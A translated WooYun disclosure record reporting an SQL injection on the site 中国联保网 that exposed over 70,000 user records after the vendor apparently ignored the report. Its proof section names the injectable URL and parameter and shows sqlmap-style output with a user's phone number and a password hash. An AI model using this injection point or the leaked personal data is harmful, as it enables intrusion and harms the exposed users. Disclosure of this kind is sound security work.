
Vulnerability summary

Defect ID: wooyun-2014-085286

Vulnerability title: A single SQL injection in 中国联保网 leaks the information and passwords of 70,000+ users

Vendor: 中国联保网

Author: 雅柏菲卡

Submitted: 2014-12-01 11:33

Fix time: 2015-01-15 11:34

Disclosed: 2015-01-15 11:34

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 7

Status: Vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-12-01: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-01-15: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

..............

Detailed description:

...........

Proof of vulnerability:

http://www.cug2313.com/repairshop_index.html?kw=1
available databases [2]:
[*] information_schema
[*] lb
Database: lb
[239 tables]
[20:47:43] [INFO] the SQL query used returns 70554 entries
[20:47:45] [INFO] retrieved:
[20:47:47] [INFO] retrieved: 13254542225
[20:47:48] [INFO] retrieved: 0.00
[20:47:49] [INFO] retrieved:
[20:47:50] [INFO] retrieved: 0
[20:47:51] [INFO] retrieved:
[20:47:51] [INFO] retrieved: 1
[20:47:52] [INFO] retrieved: 11
[20:47:53] [INFO] retrieved: 1356094382
[20:47:55] [INFO] retrieved:
[20:47:56] [INFO] retrieved: 0.00
[20:47:58] [INFO] retrieved: 14e1b600b1fd579f47433b88e8d85291

Fix recommendation:

.....................

Copyright notice: when reposting, please credit the source 雅柏菲卡@乌云


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined